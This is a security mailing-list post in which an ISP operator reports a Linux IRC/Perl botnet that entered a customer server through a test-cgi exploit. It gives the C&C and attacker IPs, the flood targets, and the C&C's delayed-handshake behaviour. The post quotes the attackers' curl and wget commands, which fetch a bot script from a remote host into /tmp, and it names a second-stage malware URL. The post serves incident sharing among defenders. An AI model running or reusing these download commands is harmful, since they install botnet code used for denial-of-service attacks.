[nsp-sec] Linux botnet AS14061, 8218, 23118 (C&C), 6739 (target)
Mike Tancsa
mike at sentex.net
Wed Apr 12 15:49:08 EDT 2017
The zip gets flagged by a few AV scanners as
perl.ircbot.Arabhac.59.UNOFFICIAL
If it got blocked, let me know and I can send it OOB
---Mike
On 4/12/2017 3:36 PM, Mike Tancsa wrote:
> ----------- nsp-security Confidential --------
>
>
>
> I had a customer's server hacked from 193.225.104.133 back on March 16th
> via an old test-cgi exploit. From there, the attackers download a shell
> script called pop
>
> which downloaded some perl scripts
>
> curl -o /tmp/oka http://162.243.110.85/.xa/oka
> wget http://162.243.110.85/.xa/oka -O /tmp/oka
>
> which connects to what appears to be an IRC server at 69.77.154.110
> I am guessing via IRC, it was told to downloaded another bot program
> from 193.227.248.244 that reaches out to the same host for attack
> information.
>
> http://193.227.248.244/intranet/mdb
>
> mdb is a perl program that does tcp/udp floods on demand getting
> commands from 69.77.154.110.
>
> Today's target were a series of IP addrs in Spain. UDP packets 35,000
> bytes in size (lots o fragmentation) directed at
> 213.37.244.4
> 213.37.244.5
> 213.37.244.6
> 213.37.244.7
> 37.158.239.230
>
> The attack today was April 12 14:23 UTC from the customer's IP
> 64.7.142.141. The customer box is cleaned up for now, so please do not
> block.
>
> The scripts are attached in the zip file. You can pass on the scripts
> as you see fit as well as the C&C info.
>
> Note, the C&C has a bit of a delay on the initial connection. So an
> impatient scanner will miss it. The first time it sees your tcp SYN, it
> will not respond with a SYN ACK for 20 seconds. It seems to cache things
> after that and allow connections normally...
> the C&C IP (69.77.154.110) was hard coded into the perl script I found.
>
> Thanks!
>
>
> ---Mike
>
>
>
>
>
>
>
> _______________________________________________
> nsp-security mailing list
> nsp-security at puck.nether.net
> https://puck.nether.net/mailman/listinfo/nsp-security
>
> Please do not Forward, CC, or BCC this E-mail outside of the nsp-security
> community. Confidentiality is essential for effective Internet security counter-measures.
> _______________________________________________
>
--
-------------------
Mike Tancsa, tel +1 519 651 3400
Sentex Communications, mike at sentex.net
Providing Internet services since 1994 www.sentex.net
Cambridge, Ontario Canada http://www.tancsa.com/
More information about the nsp-security
mailing list